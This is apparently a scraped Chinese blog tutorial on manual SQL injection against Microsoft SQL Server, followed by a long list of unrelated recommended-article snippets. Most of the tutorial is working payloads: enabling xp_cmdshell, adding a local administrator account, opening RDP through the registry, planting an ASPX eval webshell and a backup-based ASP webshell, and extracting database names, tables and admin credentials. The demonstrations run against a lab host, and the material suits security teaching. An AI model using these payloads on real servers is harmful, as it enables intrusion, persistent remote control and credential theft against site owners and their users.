布满杂草的荆棘
布满杂草的荆棘

注入之mssql数据库(手工注入)

sa最高权限(可以获取系统权限)

  •     打开一个mssql数据库

        要拼接一个参数

注入之mssql数据库(手工注入)_第1张图片

      拼接这个参数?xxser=1

注入之mssql数据库(手工注入)_第2张图片

注入之mssql数据库(手工注入)_第3张图片

  • 检查是否是mssql数据库

        and exists (select * from%20sysobjects) 

为真是属于mssql

  •    查询当前数据库系统的用户名

        and system_user=0 (由于版本问题谷歌不可以)

注入之mssql数据库(手工注入)_第4张图片

可以去虚拟机,爆出系统用户名

注入之mssql数据库(手工注入)_第5张图片

 爆出的这个

注入之mssql数据库(手工注入)_第6张图片

  •     检查注入点是否为sa权限

        and 1=(select IS_SRVROLEMEMBER('sysadmin')) 

正常就是存在sa 权限

  • 判断一下xp_cmdshell存储过程是否存在

        and 1=(select count(*) from master.dbo.sysobjects where name ='xp_cmdshell')  

正常就是存在扩展程序
 恢复  EXEC sp_configure 'show advanced options', 1;RECONFIGURE sp_configure 'xp_cmdshell', 1;RECONFIGURE;--

  •    添加帐号

        exec master..xp_cmdshell 'net user test test /add'
            查看用户

注入之mssql数据库(手工注入)_第7张图片

  没有xp_cmdshell
                    注入之mssql数据库(手工注入)_第8张图片
 

注入之mssql数据库(手工注入)_第9张图片

注入之mssql数据库(手工注入)_第10张图片

 下面的xp_cmdshell为false,直接改为true

注入之mssql数据库(手工注入)_第11张图片

或者 随便点一个数据库右键新建查询

注入之mssql数据库(手工注入)_第12张图片

select COUNT(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
 exec sp_configure 'xp_cmdshell',1
RECONFIGURE
GO
通过xp_cmdshell执行系统命令(看是否安装成功)

注入之mssql数据库(手工注入)_第13张图片

注入之mssql数据库(手工注入)_第14张图片

   ;exec master..xp_cmdshell 'net localgroup administrators test /add' 

  • 开3389

  ;execmaster.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;

注入之mssql数据库(手工注入)_第15张图片

dbowner(通过webshell插入一句话木马,控制电脑进行数据库差异备份)
    

  • 查看当前网站是否为db_owner权限

        and 1=(SELECT IS_MEMBER('db_owner'));--       判断当前数据库用户是否为db_owner权限

具备sa权限肯定具备db_owner权限

  • 找出网站路径

        1、通过报 错或baidu、google等查找
            

注入之mssql数据库(手工注入)_第16张图片

注入之mssql数据库(手工注入)_第17张图片

 2、通过相关语句
    drop table black;create Table black(result varchar(7996) null, id int not null identity (1,1))--

注入之mssql数据库(手工注入)_第18张图片

 insert into black exec master..xp_cmdshell 'dir /s c:\1.aspx'--   当前库testDB

注入之mssql数据库(手工注入)_第19张图片

  and (select result from black where id=4)>0--  

注入之mssql数据库(手工注入)_第20张图片

  • 写入一句话木马获取webshell

master..xp_cmd
  %20;exec%20master..xp_cmdshell%20'Echo%20" <%@ Page Language="Jscript"%><%eval(Request.Item["123"],"unsafe");%>">>%20c:\wwwtest\iis-xxser.com--wwwroot\sqlserver\muma.aspx'--

  多了一个木马   

注入之mssql数据库(手工注入)_第21张图片

注入之mssql数据库(手工注入)_第22张图片

 用菜刀连接

注入之mssql数据库(手工注入)_第23张图片

 可以正常操作

注入之mssql数据库(手工注入)_第24张图片

差异备份
 ;alter database testdb set RECOVERY FULL;create table test_tmp(str image);backup log testdb to disk='c:\test1' with init;insert into test_tmp(str) values (0x3C2565786375746528726571756573742822636D64222929253E);backup log testdb to disk='C:\wwwtest\iis-xxser.com--wwwroot\yjh.asp';alter database testdb set RECOVERY simple
 语句有问题

注入之mssql数据库(手工注入)_第25张图片

注入之mssql数据库(手工注入)_第26张图片

注入之mssql数据库(手工注入)_第27张图片

注入之mssql数据库(手工注入)_第28张图片

 文件已存在

注入之mssql数据库(手工注入)_第29张图片

  登录进去可以控制服务端

注入之mssql数据库(手工注入)_第30张图片

public(可以脱库,可以执行select语句)

  • 获取当前网站数据库名称

       and db_name()=0--

注入之mssql数据库(手工注入)_第31张图片

  • 获取mssql所有数据库名和路径

%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(256))%2bchar(94)%2bcast([filename]%20as%20nvarchar(256))%20from%20(select%20top%202%20dbid,name,filename%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid])%20t%20order%20by%20[dbid]%20desc)--

注入之mssql数据库(手工注入)_第32张图片

  • 获取当前数据库所有表名

        and 0<>(select top 1 name from testdb.dbo.sysobjects where xtype=0x7500 and name not in (select top 2 name from testdb.dbo.sysobjects where xtype=0x7500))--

注入之mssql数据库(手工注入)_第33张图片

  • 爆表名及字段名

        having 1=1--

注入之mssql数据库(手工注入)_第34张图片

  group by admin.id having 1=1--

注入之mssql数据库(手工注入)_第35张图片

 group by admin.id,admin.name having 1=1--
            

  •    获取字段内容

 /**/and/**/(select/**/top/**/1/**/isnull(cast([id]/**/as/**/nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([name]/**/as/**/nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([password]/**/as/**/nvarchar(4000)),char(32))/**/from/**/[testdb]..[admin]/**/where/**/1=1/**/and/**/id/**/not/**/in/**/(select/**/top/**/0/**/id/**/from/**/[testdb]..[admin]/**/where/**/1=1/**/group/**/by/**/id))%3E0/**/and/**/1=1

注入之mssql数据库(手工注入)_第36张图片

        
                

你可能感兴趣的:(常见的漏洞,oracle,数据库,安全架构)

  • 健康养生:解锁生活的幸福密码 yy0821yy 生活
    在生活的漫漫征途中,健康养生是我们收获幸福的密码。它不是一时的心血来潮,而是融入日常的生活智慧,让我们以最佳状态拥抱生活的每一刻。日常饮食是养生的基础。每一餐都应像精心调配的营养配方,谷物、蔬菜、蛋白质合理搭配。早餐,一碗热气腾腾的燕麦粥,搭配富含蛋白质的鸡蛋和清新的水果,为身体注入活力;午餐,选择富含优质蛋白的鱼肉,搭配各类色彩斑斓的蔬菜,提供下午所需的能量;晚餐则要清淡,适量的主食搭配清爽的蔬
  • open3d绘制平面 太一吾鱼水 Python点云智能处理平面
    在Open3D中绘制平面通常涉及到创建一个平面模型并将其可视化。Open3D是一个开源库,主要用于3D数据的处理和可视化,但它主要用于3D数据的处理,并不直接支持绘制2D平面。如果你想在Open3D中“绘制”一个平面,你可以通过以下几种方法来实现类似的效果:方法1:使用o3d.geometry.TriangleMesh创建平面你可以创建一个简单的平面网格,并将其视为一个2D平面。这可以通过定义一个
  • 求解插值多项式及其余项表达式 F_D_Z 数理数值分析插值多项式
    例求满足P(xj)=f(xj)P(x_j)=f(x_j)P(xj)=f(xj)(j=0,1,2j=0,1,2j=0,1,2)及P′(x1)=f′(x1)P'(x_1)=f'(x_1)P′(x1)=f′(x1)的插值多项式及其余项表达式。解:由给定条件,可确定次数不超过3的插值多项式。此多项式通过点(x0,f(x0)),(x1,f(x1))(x_0,f(x_0)),(x_1,f(x_1))(x0,f
  • SQLite Select 语句详解 wjs2024 开发语言
    SQLiteSelect语句详解SQLite是一个轻量级的数据库管理系统,以其简洁的设计和高效的性能被广泛应用于各种场景。在SQLite中,SELECT语句是用于查询数据库中的数据的命令。本文将详细介绍SQLite的SELECT语句,包括其基本语法、常用功能以及高级技巧。基本语法SQLite的SELECT语句的基本语法如下:SELECTcolumn1,column2,...FROMtable_na
  • 基于顺序存储结构的图书信息表的创建和输出 木制品123 数据结构数据结构算法
    1、基于顺序存储结构的图书信息表的创建和输出描述定义一个包含图书信息(书号、书名、价格)的顺序表,读入相应的图书数据来完成图书信息表的创建,然后统计图书表中的图书个数,同时逐行输出每本图书的信息。输入输入n+1行,其中前n行是n本图书的信息(书号、书名、价格),每本图书信息占一行,书号、书名、价格用空格分隔,价格之后没有空格。最后第n+1行是输入结束标志:000(空格分隔的三个0)。其中书号和书名
  • js根据指定字符截取字符串(正则方式) i'm wxm javascript前端开发语言
    1、截取两个字符之间的字符串varstr="aaabbbcccdddeeefff";str=str.match(/aaa(\S*)fff/)[1];alert(str);//结果bbbcccdddeee2、截取指定字符串前varstr="这个是一句话";str=str.match(/(\S*)是/)[1];alert(str);//结果--->这个3、截取指定字符后varstr="这个是一句话";
  • js判断当前时间是否在指定范围内 i'm wxm 前端javascript开发语言
    一、js判断当前时间是否在指定范围内利用js的Date对象,获得三个时间戳,分别为当前时间、开始时间、结束时间,通过比对当前时间是否在开始时间和结束时间之间,来判断是否在一个时间区间内方法一:functionisTimeInRange(startTime:any,endTime:any){//获取当前时间、开始时间、结束时间的时间戳constnow=newDate();constcurrentTi
  • vue +element UI form表单校验数组嵌套,数组对象必填校验 i'm wxm vue.jsjavascript前端
    使用element表单时会出现数组对象类型的数据结构并且需要必填校验data(){return{//表单中出现像jsonList这样的数组对象数据editForm:{script:'',paramJsonList:[{paramName:'',paramaValue:''}]},//表单校验editFormRule:{script:[{required:true,message:'请填写',tri
  • 将数组作为sql中in的查询条件 i'm wxm sql数据库
    例如将一个数组['123','12345','3456','7896‘]作为一个SQL语句的查询条件,正常这个语句应该是select字段名from表名whereuseridin('123','12345','3456','7896’)当数组数据已知且固定我们可以手动将数据填入sql语句中,当不可知或数据多时可以通过循环写入letarr=['123','12345','3456','7896‘]le
  • 量子计算机可以破解比特币吗 weixin_49526058 量子计算区块链智能合约信任链去中心化分布式账本web3
    量子计算机可能会对当前的加密算法(包括比特币使用的椭圆曲线加密)带来极大的挑战,尤其是因为它能够使用Shor算法高效地解决离散对数问题。然而,具体到量子计算机破解比特币私钥的情况,需要从以下几个方面深入理解:1.Shor算法与离散对数问题Shor算法是由数学家彼得·肖(PeterShor)在1994年提出的一种量子算法,它可以在多项式时间内解决两类经典计算机难以处理的问题:整数分解问题:这涉及RS
  • 什么是3D视觉无序抓取? 视觉人机器视觉 机器视觉3D3d人工智能视觉检测计算机视觉c#
    3D视觉无序抓取是一种结合三维视觉技术、机器人控制与智能算法的工业自动化解决方案,旨在实现机器人对散乱、无序堆放的物体进行自主识别、定位和抓取的操作。其核心是通过3D视觉系统获取物体的三维空间信息,结合路径规划与避障算法,引导机械臂完成高精度抓取任务,无需依赖预先设定的固定程序或工装夹具。以下是其关键要点:核心组成与技术原理三维视觉感知:采用3D相机(如结构光、双目视觉、ToF技术)扫描物体表面,
  • python的django后台管理_python3 django-admin 初始化后台管理项目(mysql) weixin_39582737
    环境和工具python3djangomysqlPyCharm$python3--versionPython3.7.0$django-admin--version2.2python3和django安装django初始化项目使用django-admin来初始化一个项目$django-adminstartprojectmydjango$cdmydjango$tree.├──manage.py#与该Dja
  • C++内存操纵的十二维解构艺术 王强你强 编程技术c++java开发语言
    在C++的混沌宇宙中,指针是打开时空裂缝的密钥。本文将以全新视角解构指针的本质,揭示从堆栈穿梭到多维空间映射的进阶技法,展示现代C++赋予指针的惊人可能性。一、指针本体论:内存的波粒二象性所有指针变量都是量子化的存在,既指向具体内存位置,又携带类型信息波。通过类型系统实验可验证其双重属性:templatevoidquantum_observer(T*ptr){std::cout(ptr)(&c)v
  • 程序员如何将技术咨询服务转化为SaaS产品 AI天才研究院 ChatGPTAI大模型企业级应用开发实战DeepSeekR1&大数据AI人工智能大模型大厂Offer收割机面试题简历程序员读书硅基计算碳基计算认知计算生物计算深度学习神经网络大数据AIGCAGILLMJavaPython架构设计Agent程序员实现财富自由
    引言与概述在当今快速发展的数字化时代,软件即服务(SaaS)已经成为企业服务市场的重要趋势。随着云计算和大数据技术的普及,越来越多的企业开始将传统的技术咨询服务转化为SaaS产品,以提供更加灵活、可扩展的服务。这不仅为企业带来了新的增长点,也极大地改变了技术服务行业的发展格局。SaaS市场的增长趋势SaaS市场呈现出快速增长的态势,根据市场研究机构的预测,全球SaaS市场的规模将在未来几年内持续扩
  • Android N(全志平台A40i)添加adb登录密码 阿姨打太极 androidadb
    需求:在adbshell登录终端时加入鉴权密码,鉴权开关可配置且密码可修改问题分析:见下文AndroidN:adb及adbd源码分析解决方案:思路:pc上终端输入adbshell命令后,实际上是adbd守护进程fork出的子进程来执行/bin/sh,adbd监听usb/tcp输入执行命令,并通过socket将结果回显到pc。那么我们解决该问题的方法就是在执行/bin/sh之前加入我们的校验脚本。1
  • 云开发微信小程序 - 最近火到爆的的MBTI十六人格测试 大明湖畔猿大头 小程序微信小程序腾讯云小程序
    写在开头-什么是MBTI人格测试?迈尔斯-布里格斯类型指标(Myers–BriggsTypeIndicator,MBTI)是由美国作家伊莎贝尔·布里格斯·迈尔斯和她的母亲凯瑟琳·库克·布里格斯共同制定的一种人格类型理论模型。该指标以瑞士心理学家卡尔·荣格划分的8种心理类型为基础,从而将荣格的心理类型理论付诸实践,经过二十多年的研究后,编制成了迈尔斯-布里格斯类型指标。迈尔斯在荣格的优势功能和劣势功
  • MySQL、MariaDB 和 TDSQL 的区别 sumatch mysql数据库
    MySQL、MariaDB和TDSQL是三种不同的数据库管理系统,它们在设计理念、功能、性能和使用场景上有一些显著的区别。以下是对这三者的详细比较和介绍。1.MySQL概述类型:关系型数据库管理系统(RDBMS)。开发者:最初由MySQLAB开发,后被SunMicrosystems收购,最终被OracleCorporation收购。开源:提供社区版和商业版。使用场景:广泛用于Web应用、内容管理系
  • DeepSeek 满血版的部署方案 rockmelodies deepseek人工智能deepseek
    1.环境准备确保你的服务器或本地开发环境满足以下要求:操作系统:Linux(推荐Ubuntu20.04LTS或CentOS7)内存:至少16GBCPU:至少4核硬盘:至少50GB可用空间网络:稳定的互联网连接2.安装依赖安装必要的软件包和依赖项:#更新系统包sudoapt-getupdatesudoapt-getupgrade-y#安装必要的软件包sudoapt-getinstall-ybuild
  • 低代码开发:开启企业数智化转型“快捷键” 液态不合群 低代码
    一、低代码开发浪潮来袭,企业转型正当时在当今数字化飞速发展的时代,低代码开发已如汹涌浪潮,席卷全球。从国际市场来看,诸多企业巨头纷纷布局低代码领域,像微软的PowerApps、OutSystems等平台,凭借强大功能与广泛影响力,成为众多大型企业数字化变革的得力助手。据权威数据显示,全球低代码开发技术市场规模持续上扬,预计在未来几年内仍将保持高速增长态势。在国内,低代码开发同样热度爆棚。阿里、腾讯
  • Android-Amlogic-GPIO shizhong2006 systemBSPandroid驱动开发linux
    问题显示外设供电电压是19V,通过GPIO控制上下电,下面以此为例,梳理基于Amlogic平台,在Android系统里对GPIO的控制过程。Linuxversion5.4.125-android11-2-g05a36b0e5a09-dirtyMachinemodel:AmlogicT5DT950D4AM3011.5G分析过程原理图通过原理图,确定对显示外设供电的GPIO是GPIOH_13Andro
  • Baklib知识库-企业知识库管理平台 吴间 baklib互联网企业知识库知识库管理
    随着知识经济时代的不断发展,越来越多企业意识到知识管理的重要性,市面上也不断出现了很多知识库管理软件,那么选择一个好的知识库管理平台建立企业知识库尤为重要,Baklib作为一款简单好用的在线写作软件,能够轻松搭建企业知识库,帮助企业解决在使用传统知识库时总会遇到很多问题,比如:知识储存,管理困难,查找资料耗时长,不能团队协作等等,帮助企业更好的进行知识管理。建设企业知识库的价值有助于企业知识、经验
  • 企业如何有效的构建产品知识库,让知识赋能企业,提升市场竞争力 吴间 产品文档知识管理企业知识库知识体系知识整理
    什么是产品知识库?产品知识库是将自己所获取的产品知识进行汇总和整理,是产品知识体系的初始系统。产品知识库的作用是,可以运用产品知识库中的内容去解决实际工作中遇到的问题。产品知识库的最终状态是,任何问题都可以通过搜寻产品知识库得以解决。产品知识库的价值产品知识库无论是对内(员工),还是对外(客户)都有着极大的帮助作用。对内:使企业产品信息结构化存储,方便企业知识财富积累(可以为之后产品迭代做准备)。
  • Baklib:企业知识管理的得力助手 吴间 baklib探码科技大数据数据库
    随着科技的进步,不论是在生活还是工作方面,互联网已经成为我们生活工作中不可或缺的一部分,我们经常使用的qq微信等都是互联网产品,作为企业,创新是它发展和生存的根本,一个企业的框架、组织、管理模式是非常重要的,以前的通过纸质文档存留传播信息已经out了,现在许多公司都通过群聊传达工作文件,但是这样又出现了一个问题,群聊天穿插着许许多多的文件,杂乱无章,寻找我们需要的内容往往会花费许多时间,极大降低了
  • 数据库时区的自我理解 荭色海湾 自我理解数据库
    1.JPA转化OffsetDateTime和ZoneDateTime不考虑时区只是把字面量放入并指定时区UTCDate会根据时区来转化时区设置为+08:00那么它会先把字面量的时间减少8小时在转化为时间戳,也就是转化为绝对时间戳,返回,并且按照服务器所在的时区显示时区设置为+00:00那么它就直接把字面量转化为时间戳,然后按照服务器所在的时区显示2.controller通过requestparam
  • 无边框QWidget的拖动 Sleepless_斑马 QTqt
    classLoginWidget:publicQWidget{Q_OBJECTpublic:explicitLoginWidget(QWidget*parent=nullptr);~LoginWidget()override;private:Ui::LoginWidget*ui;QPointdropPosition;boolleftPress;protected:boolevent(QEvent*
  • Java中代码的执行顺序(Java基础) Java搬码工 javaSEjava
    在Java里,不同类型代码有着特定的执行顺序,理解这些顺序对掌握程序运行逻辑十分关键。下面将详细阐述Java中不同类型代码(静态代码块、实例代码块、构造方法、静态变量、实例变量、静态方法、实例方法等)的执行顺序。单类中的代码执行顺序当只有一个类时,代码执行顺序通常为:静态变量初始化、静态代码块、实例变量初始化、实例代码块、构造方法。classSingleClassExample{//静态变量sta
  • error: array has incomplete element type ‘char []‘ Sleepless_斑马 Linux学习C语言二维数组函数参数编译错误修复方法
    原代码:voidexplain_input(char*,int*,chara[][]);报错:error:arrayhasincompleteelementtype'char[]'原因:可以用二维数组名作为实参或者形参,在被调用函数中对形参数组定义时可以指定所有维数的大小,也可以省略第一维的大小说明,但不可以省略第二位或更高维如:voidFunc(intarray[3][10])voidFunc(
  • QSqlite数据库加密方法 我是东山啊# qtqsl
    代码实现:QSqlDatabasem_db=QSqlDatabase::addDatabase("SQLITECIPHER");//必须使用对应的驱动qDebug()<
  • 微服务之消息队列 qq_40784183 微服务java架构
    在微服务架构中,服务之间的通信至关重要。而消息队列(MessageQueue,MQ)作为一种异步通信机制,能够有效解耦服务,提高系统的可扩展性、可靠性和最终一致性。1.微服务为什么要使用消息队列?在微服务架构中,服务之间通常通过同步调用(如RESTAPI)进行通信。然而,同步调用存在以下问题:耦合度高:服务之间直接依赖,任何一个服务出现故障都会影响其他服务。性能瓶颈:同步调用会阻塞线程,当调用链路
  • 到底为什么静态方法和属性是存储在内存中的一块固定位置?底层原理是什么? 快点好好学习吧 PHPjava开发语言
    静态方法和属性在PHP中之所以被认为是存储在内存中的一个固定位置,这主要与它们的特性和PHP(以及更底层的语言实现)的工作方式有关。静态成员的特性不依赖于实例:静态属性和方法属于类本身而不是类的任何实例。这意味着无论创建了多少个类的对象,静态成员都只有一份拷贝,并且可以在所有对象之间共享。生命周期长:静态成员的生命周期从脚本开始执行时初始化,直到脚本执行结束为止。相比之下,非静态成员的生命周期仅限
  • html 周华华 html
    js 1,数组的排列 var arr=[1,4,234,43,52,]; for(var x=0;x<arr.length;x++){    for(var y=x-1;y<arr.length;y++){      if(arr[x]<arr[y]){     &
  • 【Struts2 四】Struts2拦截器 bit1129 struts2拦截器
    Struts2框架是基于拦截器实现的,可以对某个Action进行拦截,然后某些逻辑处理,拦截器相当于AOP里面的环绕通知,即在Action方法的执行之前和之后根据需要添加相应的逻辑。事实上,即使struts.xml没有任何关于拦截器的配置,Struts2也会为我们添加一组默认的拦截器,最常见的是,请求参数自动绑定到Action对应的字段上。   Struts2中自定义拦截器的步骤是:
  • make:cc 命令未找到解决方法 daizj linux命令未知make cc
    安装rz sz程序时,报下面错误:   [root@slave2 src]# make posix cc   -O -DPOSIX -DMD=2 rz.c -o rz make: cc:命令未找到 make: *** [posix] 错误 127   系统:centos 6.6 环境:虚拟机   错误原因:系统未安装gcc,这个是由于在安
  • Oracle之Job应用 周凡杨 oracle job
    最近写服务,服务上线后,需要写一个定时执行的SQL脚本,清理并更新数据库表里的数据,应用到了Oracle 的 Job的相关知识。在此总结一下。   一:查看相关job信息    1、相关视图  dba_jobs  all_jobs  user_jobs  dba_jobs_running 包含正在运行
  • 多线程机制 朱辉辉33 多线程
    转至http://blog.csdn.net/lj70024/archive/2010/04/06/5455790.aspx 程序、进程和线程: 程序是一段静态的代码,它是应用程序执行的蓝本。进程是程序的一次动态执行过程,它对应了从代码加载、执行至执行完毕的一个完整过程,这个过程也是进程本身从产生、发展至消亡的过程。线程是比进程更小的单位,一个进程执行过程中可以产生多个线程,每个线程有自身的
  • web报表工具FineReport使用中遇到的常见报错及解决办法(一) 老A不折腾 web报表finereportjava报表报表工具
    FineReport使用中遇到的常见报错及解决办法(一) 这里写点抛砖引玉,希望大家能把自己整理的问题及解决方法晾出来,Mark一下,利人利己。   出现问题先搜一下文档上有没有,再看看度娘有没有,再看看论坛有没有。有报错要看日志。下面简单罗列下常见的问题,大多文档上都有提到的。   1、address pool is full: 含义:地址池满,连接数超过并发数上
  • mysql rpm安装后没有my.cnf 林鹤霄 没有my.cnf
    Linux下用rpm包安装的MySQL是不会安装/etc/my.cnf文件的, 至于为什么没有这个文件而MySQL却也能正常启动和作用,在这儿有两个说法, 第一种说法,my.cnf只是MySQL启动时的一个参数文件,可以没有它,这时MySQL会用内置的默认参数启动, 第二种说法,MySQL在启动时自动使用/usr/share/mysql目录下的my-medium.cnf文件,这种说法仅限于r
  • Kindle Fire HDX root并安装谷歌服务框架之后仍无法登陆谷歌账号的问题 aigo root
    原文:http://kindlefireforkid.com/how-to-setup-a-google-account-on-amazon-fire-tablet/   Step 4: Run ADB command from your PC   On the PC, you need install Amazon Fire ADB driver and instal
  • javascript 中var提升的典型实例 alxw4616 JavaScript
    // 刚刚在书上看到的一个小问题,很有意思.大家一起思考下吧 myname = 'global'; var fn = function () { console.log(myname); // undefined var myname = 'local'; console.log(myname); // local }; fn() // 上述代码实际上等同于以下代码 m
  • 定时器和获取时间的使用 百合不是茶 时间的转换定时器
    定时器:定时创建任务在游戏设计的时候用的比较多   Timer();定时器 TImerTask();Timer的子类  由 Timer 安排为一次执行或重复执行的任务。       定时器类Timer在java.util包中。使用时,先实例化,然后使用实例的schedule(TimerTask task, long delay)方法,设定
  • JDK1.5 Queue bijian1013 javathreadjava多线程Queue
    JDK1.5 Queue LinkedList: LinkedList不是同步的。如果多个线程同时访问列表,而其中至少一个线程从结构上修改了该列表,则它必须 保持外部同步。(结构修改指添加或删除一个或多个元素的任何操作;仅设置元素的值不是结构修改。)这一般通过对自然封装该列表的对象进行同步操作来完成。如果不存在这样的对象,则应该使用 Collections.synchronizedList 方
  • http认证原理和https bijian1013 httphttps
    一.基础介绍         在URL前加https://前缀表明是用SSL加密的。 你的电脑与服务器之间收发的信息传输将更加安全。         Web服务器启用SSL需要获得一个服务器证书并将该证书与要使用SSL的服务器绑定。 http和https使用的是完全不同的连接方式,用的端口也不一样,前者是80,后
  • 【Java范型五】范型继承 bit1129 java
    定义如下一个抽象的范型类,其中定义了两个范型参数,T1,T2   package com.tom.lang.generics; public abstract class SuperGenerics<T1, T2> { private T1 t1; private T2 t2; public abstract void doIt(T
  • 【Nginx六】nginx.conf常用指令(Directive) bit1129 Directive
    1. worker_processes    8; 表示Nginx将启动8个工作者进程,通过ps -ef|grep nginx,会发现有8个Nginx Worker Process在运行   nobody 53879 118449 0 Apr22 ? 00:26:15 nginx: worker process
  • lua 遍历Header头部 ronin47 lua header 遍历 
    local headers = ngx.req.get_headers()   ngx.say("headers begin", "<br/>")   ngx.say("Host : ", he
  • java-32.通过交换a,b中的元素,使[序列a元素的和]与[序列b元素的和]之间的差最小(两数组的差最小)。 bylijinnan java
    import java.util.Arrays; public class MinSumASumB { /** * Q32.有两个序列a,b,大小都为n,序列元素的值任意整数,无序. * * 要求:通过交换a,b中的元素,使[序列a元素的和]与[序列b元素的和]之间的差最小。 * 例如: * int[] a = {100,99,98,1,2,3
  • redis 开窍的石头 redis
    在redis的redis.conf配置文件中找到# requirepass foobared 把它替换成requirepass 12356789 后边的12356789就是你的密码 打开redis客户端输入config get requirepass 返回 redis 127.0.0.1:6379> config get requirepass 1) "require
  • [JAVA图像与图形]现有的GPU架构支持JAVA语言吗? comsci java语言
          无论是opengl还是cuda,都是建立在C语言体系架构基础上的,在未来,图像图形处理业务快速发展,相关领域市场不断扩大的情况下,我们JAVA语言系统怎么从这么庞大,且还在不断扩大的市场上分到一块蛋糕,是值得每个JAVAER认真思考和行动的事情       
  • 安装ubuntu14.04登录后花屏了怎么办 cuiyadll ubuntu
    这个情况,一般属于显卡驱动问题。 可以先尝试安装显卡的官方闭源驱动。 按键盘三个键:CTRL + ALT  +  F1 进入终端,输入用户名和密码登录终端: 安装amd的显卡驱动 sudo  apt-get  install  fglrx 安装nvidia显卡驱动 sudo  ap
  • SSL 与 数字证书 的基本概念和工作原理 darrenzhu 加密ssl证书密钥签名
    SSL 与 数字证书 的基本概念和工作原理 http://www.linuxde.net/2012/03/8301.html SSL握手协议的目的是或最终结果是让客户端和服务器拥有一个共同的密钥,握手协议本身是基于非对称加密机制的,之后就使用共同的密钥基于对称加密机制进行信息交换。 http://www.ibm.com/developerworks/cn/webspher
  • Ubuntu设置ip的步骤 dcj3sjt126com ubuntu
    在单位的一台机器完全装了Ubuntu Server,但回家只能在XP上VM一个,装的时候网卡是DHCP的,用ifconfig查了一下ip是192.168.92.128,可以ping通。 转载不是错: Ubuntu命令行修改网络配置方法 /etc/network/interfaces打开后里面可设置DHCP或手动设置静态ip。前面auto eth0,让网卡开机自动挂载. 1. 以D
  • php包管理工具推荐 dcj3sjt126com PHPComposer
    http://www.phpcomposer.com/   Composer是 PHP 用来管理依赖(dependency)关系的工具。你可以在自己的项目中声明所依赖的外部工具库(libraries),Composer 会帮你安装这些依赖的库文件。 中文文档  入门指南  下载  安装包列表 Composer 中国镜像
  • Gson使用四(TypeAdapter) eksliang jsongsonGson自定义转换器gsonTypeAdapter
    转载请出自出处:http://eksliang.iteye.com/blog/2175595 一.概述        Gson的TypeAapter可以理解成自定义序列化和返序列化 二、应用场景举例        例如我们通常去注册时(那些外国网站),会让我们输入firstName,lastName,但是转到我们都
  • JQM控件之Navbar和Tabs gundumw100 htmlxmlcss
    在JQM中使用导航栏Navbar是简单的。 只需要将data-role="navbar"赋给div即可: <div data-role="navbar"> <ul> <li><a href="#" class="ui-btn-active&qu
  • 利用归并排序算法对大文件进行排序 iwindyforest java归并排序大文件分治法Merge sort
      归并排序算法介绍,请参照Wikipeida zh.wikipedia.org/wiki/%E5%BD%92%E5%B9%B6%E6%8E%92%E5%BA%8F 基本思想: 大文件分割成行数相等的两个子文件,递归(归并排序)两个子文件,直到递归到分割成的子文件低于限制行数 低于限制行数的子文件直接排序 两个排序好的子文件归并到父文件 直到最后所有排序好的父文件归并到输入
  • iOS UIWebView URL拦截 啸笑天 UIWebView
    本文译者:candeladiao,原文:URL filtering for UIWebView on the iPhone说明:译者在做app开发时,因为页面的javascript文件比较大导致加载速度很慢,所以想把javascript文件打包在app里,当UIWebView需要加载该脚本时就从app本地读取,但UIWebView并不支持加载本地资源。最后从下文中找到了解决方法,第一次翻译,难免有
  • 索引的碎片整理SQL语句 macroli sql
    SET NOCOUNT ON DECLARE @tablename VARCHAR (128) DECLARE @execstr VARCHAR (255) DECLARE @objectid INT DECLARE @indexid INT DECLARE @frag DECIMAL DECLARE @maxfrag DECIMAL --设置最大允许的碎片数量,超过则对索引进行碎片
  • Angularjs同步操作http请求with $promise qiaolevip 每天进步一点点学习永无止境AngularJS纵观千象
    // Define a factory app.factory('profilePromise', ['$q', 'AccountService', function($q, AccountService) { var deferred = $q.defer(); AccountService.getProfile().then(function(res) {
  • hibernate联合查询问题 sxj19881213 sqlHibernateHQL联合查询
    最近在用hibernate做项目,遇到了联合查询的问题,以及联合查询中的N+1问题。 针对无外键关联的联合查询,我做了HQL和SQL的实验,希望能帮助到大家。(我使用的版本是hibernate3.3.2)   1 几个常识:  (1)hql中的几种join查询,只有在外键关联、并且作了相应配置时才能使用。  (2)hql的默认查询策略,在进行联合查询时,会产
  • struts2.xml wuai struts
    <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE struts PUBLIC "-//Apache Software Foundation//DTD Struts Configuration 2.3//EN" "http://struts.apache
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他